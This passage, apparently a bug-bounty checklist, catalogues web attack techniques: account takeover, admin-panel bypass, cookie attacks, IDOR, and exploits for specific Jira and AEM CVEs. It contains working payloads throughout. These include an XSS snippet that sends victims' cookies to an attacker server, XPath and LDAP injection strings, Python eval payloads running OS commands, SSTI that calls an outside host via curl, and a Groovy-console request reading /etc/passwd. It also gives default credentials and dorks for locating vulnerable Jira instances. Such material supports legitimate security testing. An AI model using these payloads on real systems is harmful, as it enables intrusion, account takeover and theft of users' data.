            the victim's cookies will be sent to your server
            */

            var new_img = document.createElement('img');
            new_img.src = "http://yourserver/" + document.cookie;
            new_img.style = 'display: none;'
            document.body.appendChild(new_img);
        </script>

        ```

[ ] CSRF to Account Takeover

1. check if the email update endpoint is vulnerable to CSRF
2. check if the password change endpoint is vulnerable to CSRF

[ ] IDOR to Account Takerover

1. checck if the email update endpoint is vulnerable to IDOR
2. check if the password change endpoint is vulnerable to IDOR
3. check if the password reset endpoint vulnerable to IDOR

[ ] Account takeover by Response & Status code Manipulation

[ ] Account takeover by exploiting Weak cryptography

check this
https://infosecwriteups.com/weak-cryptography-in-password-reset-to-full-account-takeover-fc61c75b36b9

[ ] Password or email change function

IF you try to change password and see email parameter in password change request, Try changing your email to victim email

[ ] Sing-Up Function

IF you try to sing-up new account in target site, in email filed try set target email

IF you try to sing-up new account in target site using 3rd party, in 3d party use phone number instead email then link 3rd account with target site.Then Go setting try link victim email in you account

[ ] Rest Token

Try to use your REST Token with Target account. Hint: email=Target@email.com&code=$Attacker_TOKEN$

Brute Force Rest Token if it is numeric. Hint : email=Target@email.com&code=$TOKEN$

Try to figure out how the token are generated: 1. Generated based on TimeStamp OR ID of user OR email of user

[ ] Host Header Injection

when send rest account request intercept POST Request and Change Host header value from target.site TO Attacker.com: Hint POST /PassRest HTTP1/1 Host: Attacker.com

[ ] CORS Misconfiguration to Account Takeover

If the page contains CORS missconfigurations you might be able to steal sensitive information from the user to takeover his account or make him change auth information for the same purpose:

https://book.hacktricks.xyz/pentesting-web/cors-bypass

[ ] Account takeover via leaked session cookie

https://hackerone.com/reports/745324

[ ] HTTP Request Smuggling to ATO

https://hackerone.com/reports/737140
https://hackerone.com/reports/740037

[ ] Bypassing Digits origin validation which leads to account takeover

https://hackerone.com/reports/129873

[ ] Top ATO report in hackerone

https://github.com/reddelexc/hackerone-reports/blob/master/tops_by_bug_type/TOPACCOUNTTAKEOVER.md

Admin Panels

[ ] defualt credentials defualt credentials

admin:admin
admin:password
author:author
administrator:password
admin123:password
username:pass12345
and many of defualt credentials

[ ] Bypass by SQL Injection

inject username or paswword with a lot of payloads:
=> error based
=> time  based

[ ] By Cross Site Scripting(XSS)

inject username or password with xss payloads:
=> url encode
=> base64 encode 

[ ] By Manipulating the Response

change the status of response from 
200 => 302
failed => success
error => success
403 => 200
403 => 302
false => true

[ ] Bypass by Brute Force Attack

https://medium.com/@uttamgupta_/1-how-to-perform-login-brute-force-using-burp-suite-9d06b67fb53d
https://medium.com/@uttamgupta_/broken-brute-force-protection-ip-block-aae835895a74

[ ] Bypass by Directory Fuzzing Attack

use this list to fuzz
https://github.com/six2dez/OneListForAll

[ ] By Removing Parameter in Request

When you enter wrong credentials the site shows error like username and password is incorrect/does not match,
password is incorrect for this username etc,
this type of response is shown by the site so can try this method Huh.
First you intercept the request and remove the password parameter in the request and forward the request.
Then the server sees that the username is available and logs you in to the site.
This problem occurs when the server does not analyze the request properly

[ ] check js file in login page

it can contain a important path or username and password

[ ] Check for comments inside the page

it can contain a important info  such as username and password

[ ] Check the PHP comparisons error:

user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

[ ] Change content type to json and send json values (bool true included)

If you get a response saying that POST is not supported you can try to send the JSON in the body but with a GET request with Content-Type: application/json

[ ] Check nodejs potential parsing error

check this article

1. Nodejs will transform that payload to a query similar to the following one: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; which makes the password bit to be always true.
2. If you can send a JSON object you can send "password":{"password": 1} to bypass the login.
3. Remember that to bypass this login you still need to know and send a valid username.
4. Adding "stringifyObjects":true option when calling mysql.createConnection will eventually block all unexpected behaviours when Object is passed in the parameter.

[ ] No SQL Injection

https://book.hacktricks.xyz/pentesting-web/nosql-injection#basic-authentication-bypass

[ ] XPath Injection

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

[ ] LDAP Injection

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

[ ] Authorization

https://www.securify.nl/en/advisory/authorization-bypass-in-infinitewp-admin-panel/

Register vulnerabilty

register vulnerability

[ ] Duplicate registration overwrite existing user

1. create first account in application with email say abc@gmail.com and password
2. logout of the account and create another account with same email and different password
3. you can even try to change email case like from abc2gmail.com to Abc@gmail.com
4. finish the creation proccess and see that it succceed
5. now go back and try to login with email and the new password ,you are seccess logged in

[ ] Dos at name /password field in sign up page

1. go to sign up form
2. fill the form and enter a long string in password 
3. click on enter and you will get 500 internal server error if it is vulnerability

[ ] no rate limit at signup page

1. enter your details in signuo form and submit the form
2. capture the signuo request and send it to intruder
3. add $$ to email parameter
4. in the payload add different email address
5. fire up intruder and check whether it return 200 ok

[ ] xss in username,email

xss can be test in any of parameter
1. payload for text field:
2. payload for email field:
3. you can use bypassing filter

[ ] email varification can be easily bypassed with following method

1. response manipulation change the bad respone with good one like false to true
2. status code manipulation change the 403 to 200

[ ] weak register implemntation

1. check whether the allows disposable email addresses
2. register form on non-https page

[ ] weak password policy

1. check whether application allows easily guessable passsword like 123456
2. check if you can use username same as the email address
3. check if can use password same as that email address
4. improperly implemented password recovery link functionality

[ ] Path Overwrite

If an application allows users to check their profile with direct path /{username} always try to signup with system reserved file names, such as index.php, signup.php, login.php, etc. In some cases what happens here is, when you signup with username: index.php, now upon visiting target.tld/index.php, your profile will comeup and occupy the index.php page of an application. Similarly, if an attacker is able to signup with username login.php, Imagine login page getting takeovered.

Cookie Attack

[ ] sensetive Data Stored in Cookies

check if anf pii or other sensitive infromation stored in  cookies this in fromation usually includes : email,sessionID, data of birth ,mobile address ,ssn ,etc.

[ ] cookie length violation leads to Buffer Overflow : A cookie length which is longer than profiled length can indicate that a buffer overflow attack attempt takes place. In a buffer overflow attack, the attacker will have to send very long strings that will generate the overflow, all of them generating this Violation.

GET  /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a

[ ] Arbitrary Cookie injection

try injecting some arbitrary cookies using attack such as CRLF injection ,
some times it can be used to escalate privilege or if the application malfunction, it can reveal sensitive infromation through stack traces

[ ] Mass Assignment

similar to the parameter poolution, however in this , attacker tried to inject multiple user ID in same user_id  parameter

[ ] Damial of service - cookie Bomb

forcing the server to process cookies larger than the resricted cookie size defined by the server may cause danial of service attack 

https://target.com/index.php?param1=xxxxxxxxxxxxxxxxxxxxxx

After input "xxxxxxxxxxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable

References: [Hackerone #105363](https://hackerone.com/reports/105363)

[ ] SQL injection

How to inject the code in Cookies?
There are many HTTP interceptors and HTTP editors that can intercept the HTTP request before it is sent to the server. Then the tester can introduce his malicious SQL statement in the cookie field.

It’s like a get/post based SQL Injection, except that certain characters can’t be used. For example, ‘**;**‘ and ‘**,**‘ are typically treated as delimiters, so they end the injection if they aren’t URL-encoded.

Cookie : sessionId=xxxbad1fdc’ order by 1# (Normal)_
Cookie : sessionId=xxxbad1fdc’ order by 2# (Error)_

after error 
sqlmap -u "" --cookie="" -p "" --dbs

[ ] parameter pollution

1. Assume that cookie utilize a parameter called **user_id=** to rerieve some data
2. however , the application is not vulnerability to idor and change **user_id** to victim value dosnt help you 
3.attacker ,add an addition another  **user_id=** parameter value to rhe cookie with vuctim user ID LIke: **user_id=atacker&user_id=victim**
4. Three things can happen here:
- the application may retrieve data of victim data
- the application may retrieve data of victim data and attacker data
- the application is not retrieve data it is not vulnerability

[ ] Authentication Bybass (cookie are not avalid)

try accessing a protected resource by removing cookies

[ ] xss

assume that the value of the cookie parameter "name" is reflected in the application
change the "name" value to "xss payload"

[ ] Insufficient session management

1. session doesnt expire on logout 
2. long session expirey
3. session doesnt expire on password reset /change
4. concurrent session

[ ] privilege escalation

• horizontal

1.assume that the application uses mult-organization models
2.cookie are used wich organized user can access
3.alter the cookie in order to access some other application

• vertical

1.assume the cookie are used to determine the role of the user
2.alter the cookie in order to elevate the role of the user

• similarly

1.try if the flower users cookies can be used to access higher users function 
2.try if the cookie of organization 1 user van be used to access function of organizaion 2

[ ] sesion puzzing

when an application utilzes the same session variable for multiple purposes , this can abused by an attacker to trick the application and perform the action as an authenticated or privileged user

[ ] Exploiting Python Code Injection this payload in cookie or contenttype or path or parameter

eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))

[ ] OS command injection

**eval(compile("""for x in range(1):\\n import os\\n os.popen(r'COMMAND').read()""",'','single'))**

eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))

**__import__('os').popen('COMMAND').read()**

[ ] URL encode some characters

param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29

param=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29

param=eval%28compile%28%22%22%22__import__%28%27os%27%29.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29

param=__import__%28%27os%27%29.popen%28%27COMMAND%27%29.read%28%29

Example with one expression

__import__('os').popen('COMMAND').read()

Example with multiple expressions, separated by commas

str("-"*50),__import__('os').popen('COMMAND').read()

[ ] Insecure Deserialization

 if cookis are using serialized Objects ,try performing insecure Deserialization Checks.
 portswigger laps

[ ] Electronic Code Book [ ] Pickle Code Execution [ ] Cipher block chainin [ ] file inclusion [ ] IDOr [ ] session fixation [ ] padding oracle attack [ ] jwt attack

Jire vulnerability

[ ] jirescan

https://github.com/netspooky/jLoot
https://github.com/0x48piraj/Jiraffe
https://github.com/bcoles/jira_scan
https://github.com/MayankPandey01/Jira-Lens
nuclie template 

[ ] cve-2017-9506 (ssrf)

Navigate to <JIRA_URL>/plugins/servlet/oauth/users/icon-url?consumerUri=<ssrf payload>

[ ] cve-2018-20824 (xss)

Navigate to <JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)

[ ] cve-2019-8451 (ssrf)

Navigate to <JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<host_name>:1337@example.com

[ ] cve-2019-8449 (user info disclosure)

Navigate to <JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true

[ ] cve-2019-8442 (sen info disc)

Navigate to <JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/ maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
Observe that the pom.xml file is accessible.

[ ] cve-2019-3403 (username enum)

Navigate to <Jira_URL>/rest/api/2/user/ picker?query=<user_name_here>
Observe the difference in response when valid vs. invalid user is queried.

[ ] cve-2019-3402 (xss)

Navigate to <JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
Observe that the payload is getting executed.

[ ] cve-2019-3396 (path traversal, rce)

1. Try Below POST Request with the JIRA Target
2. POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_ 64; rv:60.0) Gecko/20100101 Firefox/60.0 Referer: {{Hostname}}
Content-Length: 168
Connection: close <give an enter and remove this comment>
{"contentId":"786457","macro":{" name":"widget","body":"","params":{"url":" https://www.viddler.com/v/23464dc5"," width":"1000","height":"1000","_template":"file:///etc/passwd"}}}

[ ] cve-2019-11581 (template inj)

Navigate to <JIRA_URL>/secure/ContactAdministrators!default.jspa
Try SSTI payload in subject and/or body:
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://xyz.burp(.)net').waitFor()

[ ] cve-2020-14179 (info disclosure)

Navigate to <JIRA_URL>/secure/QueryComponent!Default.jspa
It leaks information about custom fields, custom SLA, etc.

[ ] cve-2020-14178 (project key enumeration)

Navigate to <JIRA_URL>/browse.<project_ key>
Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.

[ ] cve-2020-14181 (user enumeration)

Navigate to <JIRA_URL>/secure/ ViewUserHover.jspa?username=<username>
Observe the response when valid vs. invalid username is provided.

[ ] CVE-2022-26135 ( Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server )

https://github.com/assetnote/jira-mobile-ssrf-exploit

The following HTTP request can be used to reproduce this issue, once authenticated to the Jira instance:

POST /rest/nativemobile/1.0/batch HTTP/2
Host: issues.example.com
Cookie: JSESSIONID=44C6A24A15A1128CE78586A0FA1B1662; seraph.rememberme.cookie=818752%3Acc12c66e2f048b9d50eff8548800262587b3e9b1; atlassian.xsrf.token=AES2-GIY1-7JLS-HNZJ_db57d0893ec4d2e2f81c51c1a8984bde993b7445_lin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Origin: https://issues.example.com
Referer: https://issues.example.com/plugins/servlet/desk
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 63

{"requests":[{"method":"GET","location":"@example.com"}]}

[ ] Check Privileges Inside a Jira instance any user (even non-authenticated) can check its privileges in

/rest/api/2/mypermissions or 
/rest/api/3/mypermissions  

These endpoints will return your current privileges.If a non-authenticated user have any privilege, this is a vulnerability (bounty?).If an authenticated user have any unexpected privilege, this a a vuln.

#Check non-authenticated privileges
curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true'

[ ] CVE-2017-9506 , CVE-2019-8449 , CVE-2019-11581,CVE-2019-8451

https://github.com/0x48piraj/Jiraffe

[ ] cve-2018-5230

https://hackerone.com/reports/380354 
https://jira.atlassian.com/browse/JRASERVER-67289 
HOW TO EXPLOIT: https://host/issues/?filter=-8 
Go to the link above 
Click the "Updated Range:" text area 
Put your XSS payload in "More than [ ] minutes ago" (15 character payload limit) or in "In range [ ] to [ ]" (No length limit, ONLY put the payload in the first box) Click Update Payload will run.
If it doesn't run chances are you used double quotes somewhere. Only use single quotes!

[ ] CVE-2020-29453 (Pre-Auth Limited Arbitrary File Read)

http://host/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
if its not running redirecting to login panel then run it with curl

[ ] CVE-2020-36287 (Atlassian JIRA: Incorrect Authorization)

Affected software: Atlassian Jira Data Center, Jira Server (also tested on Jira Project Management Software) Affected Vesrion: Before version 8.13.5, and from version 8.14.0 before version 8.15.1 CVEID: CVE-2020-36287 CVSS Score: 5.3  
(Medium) CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Fully Patched Version: 8.13.5, 8.15.1, 8.16.0

Link: https://site.com/secure/Dashboard.jspa
POC: https://site.com/rest/dashboards/1.0/10000/gadget/{ID}/prefs
POC: https://github.com/f4rber/CVE-2020-36287
https://www.rapid7.com/db/vulnerabilities/atlassian-jira-cve-2020-36287/
https://jira.atlassian.com/browse/JRASERVER-72258 [Anonymously accessible Dashboards can leak private information via configured gadgets CVE-2020-36287]

[ ] CVE-2020-36289 (Atlassian Jira Unauth User Enumeration)

Vulnerable:
Jira < 8.5.13 8.6.0 ≤ Jira < 8.13.5 8.14.0 ≤ Jira < 8.15.1

Summary:
The remote web server hosts a web application that is affected by an information disclosure vulnerability.

Affected endpoint:
https://example.com/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin

Description:
The instance of Atlassian Jira hosted on the remote web server is affected by an information disclosure vulnerability in QueryComponentRendererValue!Default.jspa due to an improper access restriction. An unauthenticated, remote 
attacker can exploit this, by sending a specially crafted HTTP request, to disclose sensitive information which may aid in further attacks.

References:
https://jira.atlassian.com/browse/JRASERVER-71559
http://www.nessus.org/u?b658a05a

[ ] CVE-2021-26084 (Confluence Server Webwork OGNL Injection)

https://github.com/march0s1as/CVE-2021-26084

[ ] CVE-2021-26086 (Atlassian Jira Server/Data Center 8.4.0 - Limited Remote File Read/Include)

PoC:
https://github.com/ColdFusionX/CVE-2021-26086
/_/;/WEB-INF/web.xml
/_/;/WEB-INF/decorators.xml
/_/;/WEB-INF/classes/seraph-config.xml
/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
/_/%3B/WEB-INF/web.xml
/_/%3B/WEB-INF/decorators.xml
/_/%3B/WEB-INF/classes/seraph-config.xml
/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/_/%3B/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/_/%3B/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties


References:
https://cloudsek.com/threatintelligence/jira-software-server-cve-2021-26086-vulnerability-actively-exploited-in-the-wild
https://github.com/ColdFusionX/CVE-2021-26086
https://raw.githubusercontent.com/crowdsecurity/sec-lists/master/web/jira_cve_2021-26086.txt

[ ] CVE-2022-0540 - Atlassian Jira Authentication Bypass

https://github.com/Pear1y/CVE-2022-0540-RCE

[ ] Google dork section

inurl:/plugins/servlet/wallboard/
(This will give all the Jira dashboard which might be vulnerable to XSS.) (Sensitive Data Exposure)
https://www.exploit-db.com/ghdb/6528
This is testing for confluence(Older version) Found CVE:-2018-20824

Created dork: inurl:"/plugins/servlet/Wallboard/"
EP:/?dashboardId=10102&dashboardId=10103&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=fadeZoom&random=false
https://twitter.com/hackersden_/status/1417573513859244032

Useful Jira dorks:
inurl:"dashboard.jspa"
inurl:xyz intitle:JIRA login
site:*/JIRA/login
intitle:"Log In JIRA" inurl:"8080:/login.jsp"
intext:"Welcome to JIRA" "Powered by a free Atlassian Jira community"
inurl:companyname intitle:JIRA login
inurl:visma intitle:JIRA login
intext:"Confluence" ext:jsp intitle:"Jira"
inurl:http://confluence. login.action
inurl:https://wiki. .com/confluence/
allinurl: /confluence/login.action?
intitle:dashboard-confluence
inurl:/ContactAdministrators!default.jspa
inurl:/secure/attachment/ filetype:log OR filetype:txt

[ ] Github recon

Github recon Via github dorks to find secret:-
"site[dot]com" send_keys
"site[dot]com" client_secret
"site[dot]com" jira/root password

1. Aem misconfiguration

video

https://www.youtube.com/watch?v=EQNBQCQMouk

method

• collect sub domain

• use nuclei/nuclei-templates/technologies/tech-detect.yaml to identifiy aem

• Python3 ./aem_hacker.py –u https://example — host localhost

• use https://github.com/clarkvoss/AEM-List/blob/main/paths to fuzz on path

aem tools

• https://github.com/0ang3el/aem-hacker

• https://github.com/0ang3el/aem-rce-bundle

python3 aem_hacker.py    -u     --host yourvpshostname         =>comman usage
python3 aem_discovery.py --file urls.txt --workers 150         =>discover url
python3 aem_enum.py      --url                                 => automate usernames and secrets grabbing
python3 aem_ssrf2rce.py  --url  --fakaem yourvbs
python3 aem_server.py 

aem dispatcher bypasses

[ ] bypassing cve 2016-0957

https://aemsite/bin/querybuilder.json              => blocked
https://aemsite/bin/querybuilder.json/a.css        => allow
https://aemsite/bin/querybuilder.json/a.html       => allow
https://aemsite/bin/querybuilder.json/a.ico        => allow
https://aemsite/bin/querybuilder.json/a.png        => allow
https://aemsite/bin/querybuilder.json;%0aa.css     => allow
https://aemsite/bin/querybuilder.json/a.1.json     => allow

[ ] bypassing for interesting servlets

https://aemsite/bin/querybuilder.json              => blocked
https://aemsite/bin/querybuilder.json/a.css        => block
https://aemsite/bin/querybuilder.json;%0aa.css     => block
https://aemsite/bin/querybuilder.json.servlet.css  => allow
https://aemsite/bin/querybuilder.json.servlet.html => allow
https://aemsite/bin/querybuilder.json.servlet.ico  => allow
https://aemsite/bin/querybuilder.json.servlet.png  => allow
///etc.json                 instead of  /etc.json
///bin///quesrybuilder.json instead of  /bin/quesrybuilder.json

[ ] using ssrf

ssrf should allow to send GET request and see response
- Opensocial proxy
- ssrf in reportingservicesproxyservlet(cve-2018-12809)

[ ] rce via exposed Groovy console

POST /bin/groovyconsole/post.servlet HTTP/1.1
HOST:






script=sef+proc+%3d+"cat+/etc/passwd".execute()%0d%0aprintln+proc.txt

[ ] xss

POST //////content/usergenerated/etc/commerce/smartlists/vv.json






aa=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%3b

[ ] xss

POST /content/usergenerated/etc/commerce/smartlists/xss






aaa.html=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%3b

[ ] xss

POST /content/usergenerated/etc/commerce/smartlists/xssed






jcr:data=alert('xss+on+'%2b+document.domain+%2b+'\nby+%400ang3el+\ud83d\ude00')%3b&jcr:mimeType=text/html

[ ] secret from jcr

everything is stored in jcr repository :
- secrets (password  ,encryption key , tokens)
- cinfiguration
- pII
- usernames

** what to use **
- DefaultGETServlet
- QueryBUilderJsonServlet
- QueryBuilderFeedServlet
- GQLSearch Servlet
- other

** DefaultGETServlet **
- Allows to get jsr node with its props
- selectors
  - tidy
  - infinity
  - numeric value:-1,0,1...99999
- formats
  - json
  - xml
  - res  
  
- https://aem.site/tidy.3.json
  /    => jcr:root
  tidy => selector tidy
  3    => selector depth
  json => output format

- how to grap
 - get node names, start from jcr:root :
    - /.1.json
    - /.ext.json
    - /.childrenlist.json
 - or guess node names :   
    - comman names /content, /home, /var, /etc
 - Dump props for each child node of jcr:root :
    - /etc.json or /etc.s.json or /etc.-1.json 

- what to grap      
 - interesting nodes
    - /etc => may contain secrets (pass,enc,keys)
    - /apps/system/config => passwords
    - /apps/<smth>/config => passwords
    - /var => may contain private pii
    - /home => password hashed ,pii
 - interesting props-contain aem usernames
    - jcr:createdBy
    - jcr:lastModifiedBy
    - cq:LastModifiedBy 

[ ] QueryBuild Servlets

- path 
   - /bin/querybuilder.json
   - /bin/querybuilder.feed.servlet

- examples of useful searches
 - type=nt:file&nodename=*.zip
 - path=/home&p.hits-full&p.limit=-1
 - hasPermission=jcr:write&path=/content
 - hasPermission=jcr:addChild Nodes&path=/content
 - hasPermission=jcr:modify Properties&path=/content
 - p.hits-selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alast ModifiedBy&property.operation-unequals&property.value=admin&type=nt%3abase&p.limit=1000
 - path=/etc&path.flat=true&p.nodedepth=0
 - path=/etc/replication/agents.author&p.hits-full&p.nodedepth=-1

[ ] exploit SSRF

ssrf via Opensocial proxy
 - /libs/opensocial/proxy?container=default&url=http://target
 - /libs/shindig/proxy?container=default&url=http://target

[ ] ReportingServicesProxyServlet

SSRF via ReportingServicesProxyServlet (CVE-2018-12809)
- /libs/ca/contentinsight/content/proxy.reportingservices.json?url=http://target%23/apil.omniture.com/a&q=a
- /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet?url=http://target%23/apil.omniture.com/a&q=a
- /libs/mcm/salesforce/customer.json?checkType=authorize&authorization_url=http://target&customer_key=zzzz&customer_secret-zzzz&redirect_uri=xxxx&code=e

SSRF via SiteCatalystServlet
- /libs/cq/analytics/components/sitecatalystpage/segments.json.servlet 
- /libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json

[ ] DOS

- /.ext.infinity.json
- /.ext.infinity.json?tidy=true
- /bin/querybuilder.json?type=nt:base&p.limit=-1
- /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..-1&pathPrefix=
- /content.assetsearch.json?query=*&start=0&limit=10&random=123
- /..assetsearch.json?query=*&start=0&limit=10&random=123
- /system/bgservlets/test.json?cycles-999999&interval=0&flushEvery=111111111

IDOR

Base Steps:

1. Create two accounts if possible or else enumerate users first. 
2. Check if the endpoint is private or public and does it contains any kind of id param.
3. Try changing the param value to some other user and see if does anything to their account.
4. Done !!

[ ] [ ] image profilie [ ] delete acount [ ] infromation acount [ ] VIEW & DELETE & Create api_key [ ] allows to read any comment [ ] change price [ ] chnage the coin from dollar to uaro [ ] Try decode the ID, if the ID encoded using md5,base64,etc

GET /GetUser/dmljdGltQG1haWwuY29t
[...]

[ ] change HTTP method

GET /users/delete/victim_id  ->403
POST /users/delete/victim_id ->200

[ ] Try replacing parameter names

Instead of this:
GET /api/albums?album_id=<album id>

Try This:
GET /api/albums?account_id=<account id>

Tip: There is a Burp extension called Paramalyzer which will help with this by remembering all the parameters you have passed to a host.

[ ] Path Traversal

POST /users/delete/victim_id          ->403
POST /users/delete/my_id/..victim_id  ->200

[ ] change request content-type

Content-Type: application/xml ->
Content-Type: application/json

[ ] swap non-numeric with numeric id

GET /file?id=90djbkdbkdbd29dd
GET /file?id=302

[ ] Missing Function Level Acess Control

GET /admin/profile ->401
GET /Admin/profile ->200
GET /ADMIN/profile ->200
GET /aDmin/profile ->200
GET /adMin/profile ->200
GET /admIn/profile ->200
GET /admiN/profile ->200

[ ]send wildcard instead of an id

GET /api/users/user_id ->
GET /api/users/*

[ ] Never ignore encoded/hashed ID

for hashed ID ,create multiple accounts and understand the ppattern application users to allot an iD

[ ] Google Dorking/public form

search all the endpoints having ID which the search engine may have already indexed

[ ] Bruteforce Hidden HTTP parameters

use tools like arjun , paramminer 

[ ] Bypass object level authorization Add parameter onto the endpoit if not present by defualt

GET /api_v1/messages ->200
GET /api_v1/messages?user_id=victim_uuid ->200

[ ] HTTP Parameter POllution Give mult value for same parameter

GET /api_v1/messages?user_id=attacker_id&user_id=victim_id
GET /api_v1/messages?user_id=victim_id&user_id=attacker_id

[ ] change file type

GET /user_data/2341        -> 401
GET /user_data/2341.json   -> 200
GET /user_data/2341.xml    -> 200
GET /user_data/2341.config -> 200
GET /user_data/2341.txt    -> 200

[ ] json parameter pollution

{"userid":1234,"userid":2542}

[ ] Wrap the ID with an array in the body

{"userid":123} ->401
{"userid":[123]} ->200

[ ] wrap the id with a json object

{"userid":123} ->401
{"userid":{"userid":123}} ->200

[ ] Test an outdata API version

GET /v3/users_data/1234 ->401
GET /v1/users_data/1234 ->200

[ ] If the website using graphql, try to find IDOR using graphql!

GET /graphql
[...]

GET /graphql.php?query=
[...]

Authentication Bypass

[ ]

1. Check if post authentication URLs are directly accessible and do not have any session bound to it.
2. In case the URL is stolen/guessable/brute-forceable, it can lead to account takeover.

[ ] CAPTCHA Bypass - X-Forwarded-For

1. Bypass the CAPTCHA check by injecting a random value into the **X-Forwarded-For header

[ ] Lack of Password Confirmation

Test if password confirmation is necessary with these actions:
- Change Email Address
- Change Password
- Delete Account
- Manage 2FA

[ ] Lack of Verification Email

1. Check that during the registration process, an email verification is necessary

[ ] No Rate Limiting on a Form

1. Send a form and intercept the request with Burp proxy
2. Send the request to intruder
3. Repeat sending the same request 20-30 times
4. Observe that all of these forms are sent without any restrictions

[ ] No Rate Limiting or Captcha on Login Page

1. Go to login page and send the unsuccessful login attempt request to Burp Intruder
2. Change the password values for brute force as random values
3. Observe that the response to the 20 or 30th request doesn't change and the account is not locked.

[ ] Username Email Address Enumeration

1. Go to password reset/login/register or any other area that allows writing username or email address input
2. Write an existing username/email address with wrong password to observe error message
3. Write a non-existing username/email address to observe error message
4. See if error message leaks the information of the existence of username/email addresses

[ ] Weak Password Policy

1. Change password to only numerical
2. Change password to only lower case
3. Change password to common passwords
4. Change password to short passwords
5. Observe that the application has weak or no password policy

[ ] Weak Registration Implementation over HTTP

1. Intercept the request during the registration to the application via Burp
2. Observe that registration request is sent over HTTP

[ ] secure data transport

1. search on login page 
2. Send a form and intercept the request with Burp proxy
3. intercept the request with wireshark
4. make sure that the data transport is encryption or not 

[ ] Username enumeration

1. Status codes
2. Error messages
3. Response times 
   X-Forwarded-For: 

[ ] Broken Authentication Session Token Bug

1. Create a courier account or use existing one.
2. Confirm Your email address.
3. Now log out from your account and request for password reset code for your account .
4. Don't use the code that has been sent to your email address.
5. In new tab or new browser log in back to your account.
6. Go to account setting and change your password .
7. Now go to email and check the password reset code that we requested in step 3.
8. Change Your password using that reset password code .
9. You can see that your password has been changed.

[ ] Broken Authentication and Session Management

1. Create a Phabricator account having email address "a@x.com".
2. Now Logout and ask for password reset link. Don't use the password reset link sent to your mail address.
3. Login using the same password back and update your email address to "b@x.com" and verify the same. Remove "a@x.com".
4. Now logout and use the password reset link which was mailed to "a@x.com" in step 2.
5. Password will be changed.

Simple Bash Scripting Cheatsheet

---

[+] nano Shortcuts ctrl v Next page. ctrl y Previous page. ctrl w Where is (find). ctrl k Cut that line of test. ctrl x Exit editor.

[+] Create a text file: touch file Creates an empty file. ifconfig > tmp pipe the output of a command nano file

